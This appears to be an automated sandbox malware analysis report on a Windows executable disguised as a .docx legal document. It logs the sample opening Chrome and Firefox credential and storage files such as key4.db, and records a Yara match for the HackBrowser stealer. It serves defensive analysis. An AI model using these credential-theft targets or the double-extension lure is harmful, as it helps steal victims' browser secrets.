Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior

Remote Access Functionality

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

ID:	1533050
Product:	CloudBasic
Start time:	11:07:34
Start date:	14.10.2024
Sample:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	daf21b9d206ce16fc3bd087abd0c6389
SHA1:	76c67b3413830e45b0a5d938fb7976d47da10579
SHA256:	a62c290374a53ae0e30ba18422ead75f2a271a4b58cd6204940112364246d7ac
Filetype:	Win64 Executable GUI (202006/5) 92.65%

Windows Analysis Report
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Malware Threat Intel
Provided by